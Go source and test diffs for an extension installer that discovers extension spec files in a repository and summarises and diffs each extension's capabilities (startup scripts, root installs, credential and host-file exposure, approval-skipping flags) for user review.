+// split TestInspectScansTreeOnce covers for a feature: entrypoint.d belongs to
+// the selected tool, so a tool's scripts there do run and must be disclosed,
+// while feature-entrypoint.d in a tool never does.
+func TestInspectReportsToolEntrypointScripts(t *testing.T) {
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: sandbox\nname: probe\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "entrypoint.d", "10-setup.sh"), "#!/bin/sh\n", 0o755)
+	writeFixture(t, filepath.Join(dir, "feature-entrypoint.d", "20-never.sh"), "#!/bin/sh\n", 0o755)
+
+	caps, err := inspect(dir, model.KindTool)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if want := []string{"entrypoint.d/10-setup.sh"}; !reflect.DeepEqual(caps.StartupScripts, want) {
+		t.Errorf("StartupScripts = %v, want %v", caps.StartupScripts, want)
+	}
+}
+
+// TestInspectReportsUpdateProbe pins that check-update.sh is disclosed for a
+// tool. enclave executes it in a container on the ordinary run path once the
+// update interval elapses, so an extension that ships one gets a recurring
+// execution channel that the summary has to name.
+func TestInspectReportsUpdateProbe(t *testing.T) {
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: sandbox\nname: probe\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "check-update.sh"), "#!/bin/sh\necho 1.0.0\n", 0o755)
+
+	caps, err := inspect(dir, model.KindTool)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if !caps.UpdateProbe {
+		t.Fatal("UpdateProbe = false, want true")
+	}
+	var out bytes.Buffer
+	caps.render(&out, "probe")
+	if !strings.Contains(out.String(), "update probe") || !strings.Contains(out.String(), "check-update.sh") {
+		t.Errorf("rendered summary must name the update probe:\n%s", out.String())
+	}
+}
+
+// TestInspectIgnoresUpdateProbeForFeature pins the other side: the automatic
+// update check resolves the probe through ResolveToolFile, so the same file in
+// a feature never runs and must not be reported as if it did.
+func TestInspectIgnoresUpdateProbeForFeature(t *testing.T) {
+	dir := t.TempDir()
+	writeFixture(t, filepath.Join(dir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: probe\n", 0o644)
+	writeFixture(t, filepath.Join(dir, "check-update.sh"), "#!/bin/sh\necho 1.0.0\n", 0o755)
+
+	caps, err := inspect(dir, model.KindFeature)
+	if err != nil {
+		t.Fatalf("inspect: %v", err)
+	}
+	if caps.UpdateProbe {
+		t.Error("UpdateProbe = true, want false: a feature's check-update.sh is never executed")
+	}
+}
+
+// TestDiffCapabilitiesReportsAddedUpdateProbe covers an update that introduces
+// the probe, which otherwise moves only the anonymous content counts.
+func TestDiffCapabilitiesReportsAddedUpdateProbe(t *testing.T) {
+	changes := diffCapabilities(capabilities{}, capabilities{UpdateProbe: true})
+	if !strings.Contains(strings.Join(changes, "\n"), "adds check-update.sh") {
+		t.Errorf("diffCapabilities = %v, want the added probe reported", changes)
+	}
+}
+
+// TestDiffCapabilitiesReportsInstallCommandTurningRoot covers an update that
+// keeps the step count identical but drops a user field, promoting a step to
+// root.
+func TestDiffCapabilitiesReportsInstallCommandTurningRoot(t *testing.T) {
+	before := capabilities{Spec: config.SpecSummary{InstallCommands: 2, InstallCommandsAsRoot: 0}}
+	after := capabilities{Spec: config.SpecSummary{InstallCommands: 2, InstallCommandsAsRoot: 1}}
+	changes := diffCapabilities(before, after)
+	joined := strings.Join(changes, "\n")
+	if !strings.Contains(joined, "root install command") {
+		t.Errorf("diffCapabilities = %v, want a root install command change", changes)
+	}
+}
+
+func TestDiffCapabilitiesReportsNewlyEnabledYolo(t *testing.T) {
+	before := capabilities{}
+	after := capabilities{Spec: config.SpecSummary{
+		YoloFlag:    "--dangerously-skip-permissions",
+		YoloEnabled: true,
+	}}
+	changes := diffCapabilities(before, after)
+	joined := strings.Join(changes, "\n")
+	if !strings.Contains(joined, "skips approval") || !strings.Contains(joined, "--dangerously-skip-permissions") {
+		t.Errorf("diff omits the newly enabled yolo flag: %v", changes)
+	}
+	if len(diffCapabilities(after, after)) != 0 {
+		t.Error("identical yolo capabilities produced a diff")
+	}
+}
+
+// capabilityFieldCase drives the structural completeness guard below: how to
+// set one capabilities field to a representative non-zero value, a substring
+// expected to appear in render's output once it is set, and a substring
+// expected in the diffCapabilities line that reports it as newly added.
+type capabilityFieldCase struct {
+	set        func(c *capabilities)
+	wantRender string
+	wantDiff   string
+}
+
+// capabilityFieldCases enumerates every capability-bearing field this generic
+// sweep can exercise in isolation, keyed by its dotted path from capabilities
+// — including the fields of the embedded config.SpecSummary, which is where
+// most of them live. A field missing here must be listed, with a reason, in
+// the exemption set inside TestCapabilitiesFieldsParticipateInRenderAndDiff
+// instead; reflection over the struct catches one that is in neither place.
+func capabilityFieldCases() map[string]capabilityFieldCase {
+	return map[string]capabilityFieldCase{
+		"InstallScript":        {func(c *capabilities) { c.InstallScript = true }, "install.sh", "adds install.sh"},
+		"Spec.InstallCommands": {func(c *capabilities) { c.Spec.InstallCommands = 1 }, "commands.install", "install command"},
+		// Only renders alongside InstallCommands>0, so the setter also sets that;
+		// the markers below are what only InstallCommandsAsRoot produces.
+		"Spec.InstallCommandsAsRoot": {func(c *capabilities) { c.Spec.InstallCommands = 1; c.Spec.InstallCommandsAsRoot = 1 },
+			"1 as root", "root install command"},
+		"Spec.NeedsRoot":          {func(c *capabilities) { c.Spec.NeedsRoot = true }, "needsRoot", "now installs as root"},
+		"UpdateProbe":             {func(c *capabilities) { c.UpdateProbe = true }, "check-update.sh", "adds check-update.sh"},
+		"StartupScripts":          {func(c *capabilities) { c.StartupScripts = []string{"entrypoint.d/x.sh"} }, "entrypoint.d/x.sh", "startup script"},
+		"Spec.StartupCommands":    {func(c *capabilities) { c.Spec.StartupCommands = []string{"echo hi"} }, "commands.startup", "startup command"},
+		"Spec.EntrypointOverride": {func(c *capabilities) { c.Spec.EntrypointOverride = "foo --serve" }, "foo --serve", "entrypoint override"},
+		"Spec.EnvironmentVars":    {func(c *capabilities) { c.Spec.EnvironmentVars = []string{"FOO_ENV"} }, "FOO_ENV", "environment var FOO_ENV"},
+		"AllowDomains":            {func(c *capabilities) { c.AllowDomains = []string{"marker.example"} }, "marker.example", "allowlist domain marker.example"},
+		"AllowlistDirectives":     {func(c *capabilities) { c.AllowlistDirectives = []string{"conf-file=/x"} }, "conf-file=/x", "allowlist directive conf-file=/x"},
+		"Spec.DeniedDomains":      {func(c *capabilities) { c.Spec.DeniedDomains = []string{"deny.example"} }, "deny.example", "denied domain deny.example"},
+		"Spec.Ports":              {func(c *capabilities) { c.Spec.Ports = []int{12345} }, "12345", "port 12345"},
+		"Spec.CredentialEnv":      {func(c *capabilities) { c.Spec.CredentialEnv = []string{"MY_TOKEN"} }, "MY_TOKEN", "credential MY_TOKEN"},
+		"Spec.CredentialSources": {func(c *capabilities) {
+			c.Spec.CredentialSources = []config.SpecCredentialSource{{ID: "acme", ReleaseHeader: "X-Acme", ReleaseHosts: []string{"api.acme.com"}}}
+		}, "X-Acme", "credential grant acme header=X-Acme"},
+		"Spec.ProxyManaged": {func(c *capabilities) { c.Spec.ProxyManaged = []string{"HTTP_PROXY"} }, "HTTP_PROXY", "proxy-managed alias HTTP_PROXY"},
+		"Spec.Providers":    {func(c *capabilities) { c.Spec.Providers = []config.SpecProviderSummary{{Name: "acme"}} }, "acme", "provider acme"},
+		"Spec.HostExposure.PassthroughPaths": {func(c *capabilities) { c.Spec.HostExposure.PassthroughPaths = []string{"agents/"} },
+			"agents/", "passthrough path agents/"},
+		"Spec.HostExposure.HostConfigDir": {func(c *capabilities) { c.Spec.HostExposure.HostConfigDir = ".foo" },
+			".foo", "host config dir"},
+		"Spec.HostExposure.HostCredentialsFile": {func(c *capabilities) { c.Spec.HostExposure.HostCredentialsFile = ".credentials.json" },
+			".credentials.json", "host credentials file"},
+		"Spec.HostExposure.HostOAuthJSON": {func(c *capabilities) { c.Spec.HostExposure.HostOAuthJSON = ".foo.json" },
+			".foo.json", "host oauth json"},
+		"Spec.HostExposure.MixinConfigDir": {func(c *capabilities) { c.Spec.HostExposure.MixinConfigDir = ".config/foo" },
+			".config/foo", "mixin config dir"},
+		"Spec.HostExposure.MixinAuthFiles": {func(c *capabilities) { c.Spec.HostExposure.MixinAuthFiles = []string{"hosts.yml"} },
+			"hosts.yml", "mixin auth file hosts.yml"},
+		"Spec.InitFiles": {func(c *capabilities) { c.Spec.InitFiles = []config.SpecInitFileSummary{{Path: "${WORKDIR}/.foo.yaml"}} },
+			"${WORKDIR}/.foo.yaml", "init file ${WORKDIR}/.foo.yaml"},
+		"Spec.AptPackages": {func(c *capabilities) { c.Spec.AptPackages = []string{"gdb"} }, "gdb", "apt package gdb"},
+		"Skills":           {func(c *capabilities) { c.Skills = []string{"review"} }, "review", "skill review"},
+		"WorkspaceFiles":   {func(c *capabilities) { c.WorkspaceFiles = []string{"README.md"} }, "README.md", "workspace file README.md"},
+		"HomeFiles":        {func(c *capabilities) { c.HomeFiles = []string{".gitconfig"} }, ".gitconfig", "home file .gitconfig"},
+		"IgnoredGoDir":     {func(c *capabilities) { c.IgnoredGoDir = true }, "go/ handlers", "adds ignored go/ handlers"},
+		"Files":            {func(c *capabilities) { c.Files = 3 }, "3 files", "staged content changes"},
+		// Bytes only renders alongside Files>0 (the "content" row is guarded
+		// by c.Files > 0), so its setter also sets Files; the field under test
+		// is still Bytes (the markers below are Bytes' own value, not Files').
+		"Bytes": {func(c *capabilities) { c.Files = 1; c.Bytes = 999 }, "999 bytes", "999 bytes"},
+	}
+}
+
+// capabilityFieldPaths lists every leaf field reachable from typ by dotted
+// path, descending into struct-valued fields so that capabilities.Spec (and
+// the SpecHostExposure nested inside it) contribute their own fields rather
+// than one opaque entry. Without the descent the guard below would stop at
+// "Spec" and lose coverage of the ~20 spec-derived capabilities.
+func capabilityFieldPaths(typ reflect.Type, prefix string) []string {
+	var paths []string
+	for i := 0; i < typ.NumField(); i++ {
+		field := typ.Field(i)
+		path := prefix + field.Name
+		if field.Type.Kind() == reflect.Struct {
+			paths = append(paths, capabilityFieldPaths(field.Type, path+".")...)
+			continue
+		}
+		paths = append(paths, path)
+	}
+	return paths
+}
+
+// TestCapabilitiesFieldsParticipateInRenderAndDiff is the structural
+// completeness guard behind diffCapabilities' promise that every list- or
+// count-valued field on capabilities participates: the hand-enumerated tables
+// in render and diffCapabilities cannot notice a newly added field, so
+// reflection forces a case or an exemption for each one.
+func TestCapabilitiesFieldsParticipateInRenderAndDiff(t *testing.T) {
+	// exempt names the fields this single-field-at-a-time sweep cannot
+	// exercise, and why.
+	exempt := map[string]string{
+		"Spec.YoloFlag": "only active together with YoloEnabled; covered by TestInspectYoloDefaultsToEnabled " +
+			"and TestDiffCapabilitiesReportsNewlyEnabledYolo",
+		"Spec.YoloEnabled":     "see Spec.YoloFlag",
+		"Spec.DefaultEnabled":  "the spec's opt-in flag, not a capability; covered by TestAddOptInFeaturePrintsEnableHint",
+		"Spec.DefaultIncluded": "a profile-composition default, not a capability",
+		"Spec.AllowedDomains": "folded into capabilities.AllowDomains by inspect; covered by " +
+			"TestInspectReportsCapabilities",
+		"Spec.Kind":        "extension identity, not a capability: render's header carries it",
+		"Spec.Name":        "extension identity, not a capability: render's header carries it",
+		"Spec.DisplayName": "extension identity, not a capability; reported by `list --json`",
+		"Spec.Description": "extension identity, not a capability; reported by `list --json`",
+		"ShadowsBuiltin": "set by the installer around inspect rather than derived from the tree; diffing it " +
+			"would read as 'newly shadowing' on every update of an extension that already shadows a built-in",
+	}
+	cases := capabilityFieldCases()
+
+	paths := capabilityFieldPaths(reflect.TypeOf(capabilities{}), "")
+	if len(paths) < len(cases)+len(exempt) {
+		t.Fatalf("reflection found only %d fields for %d cases and %d exemptions: the walk is not "+
+			"descending into the spec projection", len(paths), len(cases), len(exempt))
+	}
+	for _, path := range paths {
+		if reason, ok := exempt[path]; ok {
+			t.Logf("skipping %s: %s", path, reason)
+			delete(exempt, path)
+			continue
+		}
+		tc, ok := cases[path]
+		if !ok {
+			t.Fatalf("capability field %q has no case in capabilityFieldCases and is not in the "+
+				"exemption set in this test; add one or exempt it deliberately", path)
+		}
+		delete(cases, path)
+		t.Run(path, func(t *testing.T) {
+			var after capabilities
+			tc.set(&after)
+
+			var buf bytes.Buffer
+			after.render(&buf, "header")
+			if !strings.Contains(buf.String(), tc.wantRender) {
+				t.Errorf("render output does not contain %q for field %s:\n%s", tc.wantRender, path, buf.String())
+			}
+
+			var before capabilities
+			changes := diffCapabilities(before, after)
+			if len(changes) == 0 {
+				t.Fatalf("diffCapabilities produced no changes when only %s differs from its zero value", path)
+			}
+			if joined := strings.Join(changes, "\n"); !strings.Contains(joined, tc.wantDiff) {
+				t.Errorf("diffCapabilities output does not contain %q for field %s: %v", tc.wantDiff, path, changes)
+			}
+		})
+	}
+	// Anything left over names a field that no longer exists, which would
+	// otherwise let a renamed field keep a stale case and lose its coverage.
+	for path := range cases {
+		t.Errorf("capabilityFieldCases has a case for %q, which is not a field of capabilities", path)
+	}
+	for path := range exempt {
+		t.Errorf("the exemption set names %q, which is not a field of capabilities", path)
+	}
+}
+
+// TestWritesIntoProject covers the destinations an initFiles path can resolve
+// to once kit-init.sh has run envsubst over it. The unbraced forms matter as
+// much as the braced ones: envsubst expands both.
+func TestWritesIntoProject(t *testing.T) {
+	for _, tc := range []struct {
+		path string
+		want bool
+	}{
+		{"${WORKDIR}/.foo.yaml", true},
+		{"$WORKDIR/.foo.yaml", true},
+		{"${HOME}/.config/foo.yaml", false},
+		{"$HOME/.config/foo.yaml", false},
+		{"/etc/foo.yaml", false},
+		// No shell ever sees this path: kit-init.sh runs envsubst over it and
+		// uses the result quoted, so "~" stays a literal directory name under
+		// the project rather than expanding to the home directory.
+		{"~/.config/foo.yaml", true},
+		{".foo.yaml", true},
+		{"nested/.foo.yaml", true},
+		{"${USER}/.foo.yaml", true},
+		{"", false},
+		{"   ", false},
+		// Not in the envsubst whitelist, so it stays literal and resolves like
+		// any other relative segment.
+		{"$PROJECT_DIR/.foo.yaml", true},
+		// envsubst reads the longest identifier, so these are their own
+		// (unsubstituted) variables rather than HOME/WORKDIR plus text.
+		{"$HOMEBREW_PREFIX/foo.yaml", true},
+		{"$WORKDIR_EXTRA/foo.yaml", true},
+	} {
+		if got := writesIntoProject(tc.path); got != tc.want {
+			t.Errorf("writesIntoProject(%q) = %v, want %v", tc.path, got, tc.want)
+		}
+	}
+}

--- a/internal/extinstall/discover.go
+++ b/internal/extinstall/discover.go
@@ -1,0 +1,130 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"path"
+	"path/filepath"
+	"sort"
+	"strings"
+
+	"enclave/internal/config"
+	"enclave/internal/model"
+)
+
+// maxCandidateDepth bounds how deep a spec document may sit below the
+// repository root, so a pathological tree cannot turn discovery into a crawl.
+const maxCandidateDepth = 8
+
+// candidate is a directory in a fetched repository that holds a spec document.
+type candidate struct {
+	Dir  string // slash path relative to the repository root; "" is the root
+	Name string // base name of Dir, or the repository root's own name
+}
+
+// classified is a candidate whose spec has been parsed. Skip carries the reason
+// a directory cannot be installed; such entries are reported, never silently
+// dropped.
+type classified struct {
+	candidate
+	SpecKind string
+	Skip     string
+}
+
+// candidateDirs finds directories containing a spec document in a repository
+// file listing. It reads the listing rather than a checkout, so no file content
+// has to be downloaded to discover what a repository offers. With subpath set,
+// only that directory is considered and its absence is an error.
+func candidateDirs(files []string, subpath string) ([]candidate, error) {
+	dirs := map[string]struct{}{}
+	for _, file := range files {
+		base := path.Base(file)
+		if base != config.SpecFilename && base != config.SpecFilenameJSON {
+			continue
+		}
+		dir := path.Dir(file)
+		if dir == "." {
+			dir = ""
+		}
+		// Apply depth bound only for unscoped discovery; explicit subpaths are
+		// resolved regardless of depth.
+		if subpath == "" && dir != "" && len(strings.Split(dir, "/")) > maxCandidateDepth {
+			continue
+		}
+		dirs[dir] = struct{}{}
+	}
+
+	if subpath != "" {
+		if _, ok := dirs[subpath]; !ok {
+			return nil, fmt.Errorf("no %s in %s", config.SpecFilename, subpath)
+		}
+		return []candidate{{Dir: subpath, Name: path.Base(subpath)}}, nil
+	}
+
+	candidates := make([]candidate, 0, len(dirs))
+	for dir := range dirs {
+		name := path.Base(dir)
+		if dir == "" {
+			name = ""
+		}
+		candidates = append(candidates, candidate{Dir: dir, Name: name})
+	}
+	sort.Slice(candidates, func(i, j int) bool { return candidates[i].Dir < candidates[j].Dir })
+	return candidates, nil
+}
+
+// classify parses each candidate's spec document from a materialized checkout.
+// A candidate whose spec cannot be read, or whose declared name disagrees with
+// its directory name, is marked with a Skip reason: the extension loader
+// resolves extensions by directory name, so such a directory could never load.
+func classify(repoDir string, candidates []candidate) []classified {
+	entries := make([]classified, 0, len(candidates))
+	for _, cand := range candidates {
+		entry := classified{candidate: cand}
+		summary, err := config.SummarizeSpecDir(filepath.Join(repoDir, filepath.FromSlash(cand.Dir)))
+		if err != nil {
+			entry.Skip = fmt.Sprintf("cannot read %s: %v", config.SpecFilename, err)
+			entries = append(entries, entry)
+			continue
+		}
+		entry.SpecKind = summary.Kind
+		switch {
+		case summary.Name == "":
+			entry.Skip = fmt.Sprintf("%s declares no name", config.SpecFilename)
+		case cand.Name == "":
+			// Repository-root extension: the directory name is the repository's,
+			// so the spec name is authoritative and there is nothing to compare.
+			entry.Name = summary.Name
+		case summary.Name != cand.Name:
+			entry.Skip = fmt.Sprintf("%s declares name %q but its directory is %q", config.SpecFilename, summary.Name, cand.Name)
+		}
+		entries = append(entries, entry)
+	}
+	return entries
+}
+
+// selectKind partitions classified candidates into those matching kind, those
+// of the opposite kind (so the caller can name the right verb), and those that
+// cannot be installed at all.
+func selectKind(entries []classified, kind model.ExtensionKind) (match []classified, other []classified, skipped []classified) {
+	for _, entry := range entries {
+		switch {
+		case entry.Skip != "":
+			skipped = append(skipped, entry)
+		case entry.SpecKind == kind.SpecKind():
+			match = append(match, entry)
+		case entry.SpecKind == kind.Other().SpecKind():
+			other = append(other, entry)
+		default:
+			entry.Skip = fmt.Sprintf("unknown kind %q", entry.SpecKind)
+			skipped = append(skipped, entry)
+		}
+	}
+	return match, other, skipped
+}

--- a/internal/extinstall/discover_test.go
+++ b/internal/extinstall/discover_test.go
@@ -1,0 +1,138 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"path/filepath"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+func TestCandidateDirsFindsSpecDirectories(t *testing.T) {
+	files := []string{
+		"README.md",
+		"extensions/features/foo/spec.yaml",
+		"extensions/features/foo/install.sh",
+		"extensions/tools/bar/spec.json",
+		"website/index.html",
+	}
+	got, err := candidateDirs(files, "")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 2 {
+		t.Fatalf("candidates = %+v, want two", got)
+	}
+	if got[0].Dir != "extensions/features/foo" || got[0].Name != "foo" {
+		t.Errorf("first candidate = %+v", got[0])
+	}
+	if got[1].Dir != "extensions/tools/bar" || got[1].Name != "bar" {
+		t.Errorf("second candidate = %+v", got[1])
+	}
+}
+
+func TestCandidateDirsRepositoryRoot(t *testing.T) {
+	got, err := candidateDirs([]string{"spec.yaml", "install.sh"}, "")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 1 || got[0].Dir != "" {
+		t.Fatalf("candidates = %+v, want the repository root", got)
+	}
+}
+
+func TestCandidateDirsHonorsSubpath(t *testing.T) {
+	files := []string{
+		"extensions/features/foo/spec.yaml",
+		"extensions/features/bar/spec.yaml",
+	}
+	got, err := candidateDirs(files, "extensions/features/bar")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 1 || got[0].Name != "bar" {
+		t.Fatalf("candidates = %+v, want only bar", got)
+	}
+}
+
+func TestCandidateDirsSubpathWithoutSpec(t *testing.T) {
+	files := []string{"extensions/features/foo/spec.yaml"}
+	if _, err := candidateDirs(files, "extensions/features/nope"); err == nil {
+		t.Fatal("candidateDirs accepted a subpath with no spec document")
+	}
+}
+
+func TestCandidateDirsDepthBoundExcludesDeeperThanBound(t *testing.T) {
+	files := []string{"a/b/c/d/e/f/g/h/i/spec.yaml"} // one segment past maxCandidateDepth
+	got, err := candidateDirs(files, "")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 0 {
+		t.Fatalf("candidates = %+v, want none for spec deeper than depth bound", got)
+	}
+}
+
+func TestCandidateDirsDepthBoundRespectedForExplicitSubpath(t *testing.T) {
+	files := []string{"a/b/c/d/e/f/g/h/i/spec.yaml"} // one segment past maxCandidateDepth
+	got, err := candidateDirs(files, "a/b/c/d/e/f/g/h/i")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 1 || got[0].Dir != "a/b/c/d/e/f/g/h/i" {
+		t.Fatalf("candidates = %+v, want the deep spec when named explicitly", got)
+	}
+}
+
+func TestCandidateDirsDepthBoundIncludesAtBound(t *testing.T) {
+	files := []string{"a/b/c/d/e/f/g/h/spec.yaml"} // exactly maxCandidateDepth
+	got, err := candidateDirs(files, "")
+	if err != nil {
+		t.Fatalf("candidateDirs: %v", err)
+	}
+	if len(got) != 1 || got[0].Dir != "a/b/c/d/e/f/g/h" {
+		t.Fatalf("candidates = %+v, want the spec at the depth boundary", got)
+	}
+}
+
+func TestClassifyAndSelectKind(t *testing.T) {
+	repo := t.TempDir()
+	writeFixture(t, filepath.Join(repo, "extensions", "features", "foo", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	writeFixture(t, filepath.Join(repo, "extensions", "tools", "bar", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: sandbox\nname: bar\n", 0o644)
+	writeFixture(t, filepath.Join(repo, "extensions", "features", "renamed", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: different\n", 0o644)
+	writeFixture(t, filepath.Join(repo, "extensions", "features", "broken", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: broken\nbogus: 1\n", 0o644)
+
+	candidates := []candidate{
+		{Dir: "extensions/features/foo", Name: "foo"},
+		{Dir: "extensions/tools/bar", Name: "bar"},
+		{Dir: "extensions/features/renamed", Name: "renamed"},
+		{Dir: "extensions/features/broken", Name: "broken"},
+	}
+	classified := classify(repo, candidates)
+	match, other, skipped := selectKind(classified, model.KindFeature)
+
+	if len(match) != 1 || match[0].Name != "foo" {
+		t.Fatalf("match = %+v, want only foo", match)
+	}
+	if len(other) != 1 || other[0].Name != "bar" {
+		t.Fatalf("other = %+v, want only bar", other)
+	}
+	if len(skipped) != 2 {
+		t.Fatalf("skipped = %+v, want the mismatched and the malformed dirs", skipped)
+	}
+	for _, entry := range skipped {
+		if entry.Skip == "" {
+			t.Fatalf("skipped entry %q has no reason", entry.Name)
+		}
+	}
+}

--- a/internal/extinstall/discover_test.go
+++ b/internal/extinstall/discover_test.go
@@ -8,6 +8,7 @@
 package extinstall
 
 import (
+	"os"
 	"path/filepath"
 	"testing"
 
@@ -98,6 +99,30 @@ func TestCandidateDirsDepthBoundIncludesAtBound(t *testing.T) {
 	}
 	if len(got) != 1 || got[0].Dir != "a/b/c/d/e/f/g/h" {
 		t.Fatalf("candidates = %+v, want the spec at the depth boundary", got)
+	}
+}
+
+// TestClassifySkipsSymlinkedSpec covers discovery reading a fetched
+// repository's content before anything has been sanitized: a spec committed as
+// a symlink is reported as unusable, not followed out of the checkout.
+func TestClassifySkipsSymlinkedSpec(t *testing.T) {
+	repo := t.TempDir()
+	outside := filepath.Join(t.TempDir(), "elsewhere.yaml")
+	writeFixture(t, outside, "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	dir := filepath.Join(repo, "features", "foo")
+	if err := os.MkdirAll(dir, 0o750); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	if err := os.Symlink(outside, filepath.Join(dir, "spec.yaml")); err != nil {
+		t.Skipf("symlink unsupported: %v", err)
+	}
+
+	entries := classify(repo, []candidate{{Dir: "features/foo", Name: "foo"}})
+	if len(entries) != 1 {
+		t.Fatalf("entries = %+v, want one", entries)
+	}
+	if entries[0].Skip == "" {
+		t.Fatalf("entry = %+v, want a skip reason for the symlinked spec", entries[0])
 	}
 }
 

--- a/internal/extinstall/env.go
+++ b/internal/extinstall/env.go
@@ -30,8 +30,11 @@ type Env struct {
 	// which is what a caller whose whole report is the result envelope wants.
 	// It is separate from that envelope, which the caller writes itself.
 	Narration io.Writer
-	Now       func() time.Time
-	Version   string
+	// Style decorates that narration. The zero value is plain text at a
+	// default width, which is what a pipe and a test buffer want.
+	Style   Style
+	Now     func() time.Time
+	Version string
 }
 
 func (e Env) now() time.Time {
@@ -49,12 +52,17 @@ func (e Env) narrate() io.Writer {
 	return e.Narration
 }
 
-// confirm asks the user a yes/no question on the narration stream.
+// confirm asks the user a yes/no question on the narration stream. The answer
+// is followed by a blank line so what happens next starts on a line of its
+// own: a piped stdin echoes nothing, and without this the outcome would be
+// appended to the prompt.
 func (e Env) confirm(question string) (bool, error) {
 	if e.Narration == nil {
 		return false, fmt.Errorf("cannot ask for confirmation without an output stream; pass --yes")
 	}
-	return prompt.Confirm(question, e.Stdin, e.Narration)
+	answer, err := prompt.Confirm(question, e.Stdin, e.Narration)
+	_, _ = fmt.Fprintln(e.Narration)
+	return answer, err
 }
 
 // kindDir is the user extension directory this run installs into.

--- a/internal/extinstall/env.go
+++ b/internal/extinstall/env.go
@@ -1,0 +1,72 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"io"
+	"strings"
+	"time"
+
+	"enclave/internal/config"
+	"enclave/internal/model"
+	"enclave/internal/prompt"
+)
+
+// Env carries the ambient dependencies of an install run.
+type Env struct {
+	Paths   model.Paths
+	Home    string
+	Fetcher Fetcher
+	Stdin   io.Reader
+	// Narration is where this package's human-facing lines go: discovery,
+	// warnings, capability summaries, per-extension outcomes, hints, and the
+	// text of any confirmation prompt. A nil Narration renders none of it,
+	// which is what a caller whose whole report is the result envelope wants.
+	// It is separate from that envelope, which the caller writes itself.
+	Narration io.Writer
+	Now       func() time.Time
+	Version   string
+}
+
+func (e Env) now() time.Time {
+	if e.Now == nil {
+		return time.Now().UTC()
+	}
+	return e.Now()
+}
+
+// narrate is the narration stream, or a sink when there is none.
+func (e Env) narrate() io.Writer {
+	if e.Narration == nil {
+		return io.Discard
+	}
+	return e.Narration
+}
+
+// confirm asks the user a yes/no question on the narration stream.
+func (e Env) confirm(question string) (bool, error) {
+	if e.Narration == nil {
+		return false, fmt.Errorf("cannot ask for confirmation without an output stream; pass --yes")
+	}
+	return prompt.Confirm(question, e.Stdin, e.Narration)
+}
+
+// kindDir is the user extension directory this run installs into.
+func (e Env) kindDir(kind model.ExtensionKind) string {
+	_, userRoot := config.ExtensionRoots(e.Paths, kind)
+	return userRoot
+}
+
+// lockPath is the host lock that serializes staging and swapping.
+func (e Env) lockPath() string {
+	if strings.TrimSpace(e.Home) == "" {
+		return ""
+	}
+	return config.HostLockPath(e.Home, "extensions.lock")
+}

--- a/internal/extinstall/fake_fetcher_test.go
+++ b/internal/extinstall/fake_fetcher_test.go
@@ -1,0 +1,147 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"testing"
+	"time"
+
+	"enclave/internal/model"
+)
+
+// fakeRepo serves a fixed file tree from a temp directory. Materialize is a
+// no-op because everything is already on disk, which is exactly the observable
+// contract a sparse checkout provides.
+type fakeRepo struct {
+	dir     string
+	commit  string
+	ref     string
+	refType string
+	files   []string
+}
+
+func (r *fakeRepo) Commit() string  { return r.commit }
+func (r *fakeRepo) Ref() string     { return r.ref }
+func (r *fakeRepo) RefType() string { return r.refType }
+func (r *fakeRepo) Files() []string { return r.files }
+func (r *fakeRepo) Dir() string     { return r.dir }
+func (r *fakeRepo) Close()          {}
+
+func (r *fakeRepo) Materialize(context.Context, []string) error { return nil }
+
+type fakeFetcher struct {
+	repo     *fakeRepo
+	openErr  error
+	resolves int
+	opens    int
+}
+
+func (f *fakeFetcher) ResolveRef(_ context.Context, _ string, ref string) (RemoteRef, error) {
+	f.resolves++
+	if f.openErr != nil {
+		return RemoteRef{}, f.openErr
+	}
+	resolved := RemoteRef{Commit: f.repo.commit, Ref: f.repo.ref, RefType: f.repo.refType}
+	if ref != "" && ref != f.repo.ref {
+		resolved.Ref = ref
+	}
+	return resolved, nil
+}
+
+func (f *fakeFetcher) Open(ctx context.Context, remote string, ref string) (Repo, error) {
+	resolved, err := f.ResolveRef(ctx, remote, ref)
+	if err != nil {
+		return nil, err
+	}
+	return f.OpenAt(ctx, remote, resolved)
+}
+
+func (f *fakeFetcher) OpenAt(_ context.Context, _ string, _ RemoteRef) (Repo, error) {
+	f.opens++
+	if f.openErr != nil {
+		return nil, f.openErr
+	}
+	return f.repo, nil
+}
+
